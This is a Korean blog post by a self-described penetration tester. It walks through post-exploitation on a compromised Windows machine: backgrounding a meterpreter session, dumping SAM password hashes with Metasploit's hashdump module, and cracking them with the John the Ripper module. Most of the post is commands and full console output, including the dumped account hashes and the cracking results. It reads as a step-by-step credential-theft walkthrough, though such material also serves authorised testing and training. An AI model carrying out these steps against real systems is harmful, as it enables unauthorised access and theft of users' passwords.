| | at : |
Archive

[METASPLOIT] Metasploit 을 이용한 HashDump 및 Password Crack(John the Ripper) 하훌 rwxr-xr-x 0 8/13/2015



[METASPLOIT] Metasploit 을 이용한 HashDump 및 Password Crack(John the Ripper)

Permission rw-r--r--
Author 하훌
Date and Time 8/13/2015
Label
License 크리에이티브 커먼즈 라이선스


Metasploit 모듈 중 post/hashdump 와 john(john the ripper)를 통한 hash crack에 대한 이야기를 할까 합니다.
일단 meterpreter 쉘을 target pc 에 주입 및 구동하여 shell 연결을 유지합니다.

meterpreter > ls
Listing: C:\Documents and Settings\LocalService\Cookies
=======================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  16384  fil   2015-08-13 12:28:33 +0900  index.dat

meterpreter >

POST/WINDOWS/GATHER/HASHDUMP 모듈을 이용한 SAM Dump


여기서 공격자는 POST 모듈을 사용하기 위해 metasploit 으로 돌아갑니다.
background 명령을 사용하여 세션은 유지한 채 msf 로 돌아갈 수 있습니다.

meterpreter > background
[*] Backgrounding session 1...
hahwul exploit(handler) #>
hahwul exploit(handler) #>


post 모듈 중 windows 의 hashdump 모듈을 이용하여 SAM 파일 덤프를 뜹니다.

hahwul exploit(handler) #> use post/windows/gather/hashdump 
hahwul post(hashdump) #> set session 1 
session => 1
hahwul post(hashdump) #> run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY cbda43cfe588e98549abf078ee086266...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:21ac9e2845f703fd49d14b2205b6cafe:658865617e824fc4be4ecd78969e89f4:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ed4d8906fe997c250615fd2c9cac861c:::


[*] Post module execution completed

JOHN THE RIPPER 모듈을 이용한 PASSWORD CRACK


dump 된 파일이 메모리에 머무르고 있기 때문에 바로 john the ripper 모듈과 연동이 가능합니다.
jtr 모듈 로드 후 바로 run 해줍니다.

hahwul post(hashdump) #> use auxiliary/analyze/jtr_crack_fast
hahwul auxiliary(jtr_crack_fast) #> run

[*] Wordlist file written out to /tmp/jtrtmp20150813-12465-1bewq4x
[*] Hashes Written out to /tmp/hashes_tmp20150813-12465-130ap5v
[*] Cracking lm hashes in normal wordlist mode...
guesses: 0  time: 0:00:00:00 DONE (Thu Aug 13 14:14:32 2015)  c/s: 4630K  trying: ZITHER - TUDE
[*] Loaded 3 password hashes with no different salts (LM DES [128/128 BS SSE2-16])
[*] Cracking lm hashes in single mode...
guesses: 0  time: 0:00:00:06 DONE (Thu Aug 13 14:14:38 2015)  c/s: 7793K  trying: YB1900 - E1900
[*] Loaded 3 password hashes with no different salts (LM DES [128/128 BS SSE2-16])
[*] Cracking lm hashes in incremental mode (All4)...
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
guesses: 1  time: 0:00:00:03 DONE (Thu Aug 13 14:14:41 2015)  c/s: 47858K  trying: ||V} - |||}
Warning: passwords printed above might be partial and not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
[*] Loaded 3 password hashes with no different salts (LM DES [128/128 BS SSE2-16])
[*]                  (guest)
[*] Cracking lm hashes in incremental mode (Digits)...
Warning: MaxLen = 8 is too large for the current hash type, reduced to 7
guesses: 0  time: 0:00:00:00 DONE (Thu Aug 13 14:14:42 2015)  c/s: 38986K  trying: 9196448 - 9196495
[*] Loaded 3 password hashes with no different salts (LM DES [128/128 BS SSE2-16])
[*] Remaining 2 password hashes with no different salts
[*] Cracked Passwords this run:
[+] guest::2
[+] administrator::1
[+] guest::2
[+] administrator::1
[*] Cracking nt hashes in normal wordlist mode...
guesses: 0  time: 0:00:00:00 DONE (Thu Aug 13 14:14:42 2015)  c/s: 9719K  trying: z - tude
[*] Loaded 3 password hashes with no different salts (NT MD4 [128/128 X2 SSE2-16])
[*] Cracking nt hashes in single mode...
guesses: 0  time: 0:00:00:13 DONE (Thu Aug 13 14:14:56 2015)  c/s: 17243K  trying: zwelithini1900 - tude1900
[*] Loaded 3 password hashes with no different salts (NT MD4 [128/128 X2 SSE2-16])
[*] Cracking nt hashes in incremental mode (Digits)...
guesses: 0  time: 0:00:00:03 DONE (Thu Aug 13 14:14:59 2015)  c/s: 88888K  trying: 83536787 - 83536784
[*] Loaded 3 password hashes with no different salts (NT MD4 [128/128 X2 SSE2-16])
[*] Cracked Passwords this run:
[*] Auxiliary module execution completed


별다른 정보가 나오지는 않았지만, Crack 이 된다면 아래와 같은 형태의 메시지를 받을 수 있습니다.
[+] Cracked: Guest: 
[+] Cracked: TESTAAA:password 

물론 직접 john 을 설치하여 crack도 가능하지만, metasploit 을 사용하여 테스트 시 위와 같은 방법이 더 편할거라 생각됩니다. :)

Share







HAHWUL
HACKING | PENETRATION-TEST | CODING
HACKERONE : GIT : 0DAY-TODAY : EXPLOIT-DB : PACKETSTORM
GOOGLE+ | HAHWUL@GMAIL.COM | TWITTER
WWW.HAHWUL.COM




0 개의 댓글:

댓글 쓰기